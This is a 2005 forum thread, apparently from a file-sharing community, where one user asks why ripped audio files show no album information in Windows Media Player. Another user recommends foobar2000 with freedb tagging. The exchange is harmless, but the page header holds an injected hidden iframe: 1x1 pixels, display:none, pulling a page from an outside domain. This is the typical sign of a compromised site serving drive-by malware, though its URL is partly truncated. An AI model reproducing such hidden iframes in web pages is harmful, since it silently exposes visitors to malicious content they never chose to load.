Recommended file types, cont...

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Lucozade_Taylor
Account Disabled Due to Policy

Recommended file types, cont...

Post by Lucozade_Taylor » 2005-11-13 09:09

I got some very helpful advice yesturday which helped a lot, i know have Exact Audio Copy and it is a very good program, there is one problem i am still having. When i put the files into windows media player, i cannot find the album information, so they are all appearing as unknown in my media player, can anyone help me?

bastya_elvtars

Post by bastya_elvtars » 2005-11-13 10:05

Well, if you are an audio freak, don't use Windows Media Player. Use foobar200 which can tag albums from freedb (amongst other features, incl. native support for shitloads of audio formats). You will be pleased by its functionality.
Hey you, / Don't help them to bury the light... / Don't give in / Without a fight. (Pink Floyd)

Lucozade_Taylor
Account Disabled Due to Policy

Thanx

Post by Lucozade_Taylor » 2005-11-13 10:49

Cheers Bastya, it's all working, it's about time things became a bit easier, thanx again for the help, i can relax and enjoy using the hubs and have great music, cheers mate, :D

bastya_elvtars

Post by bastya_elvtars » 2005-11-13 11:09

Glad you sorted it out.
I have worked a lot with digital audio (remastering, conversion etc.) so I have made my toolkit. :)
Hey you, / Don't help them to bury the light... / Don't give in / Without a fight. (Pink Floyd)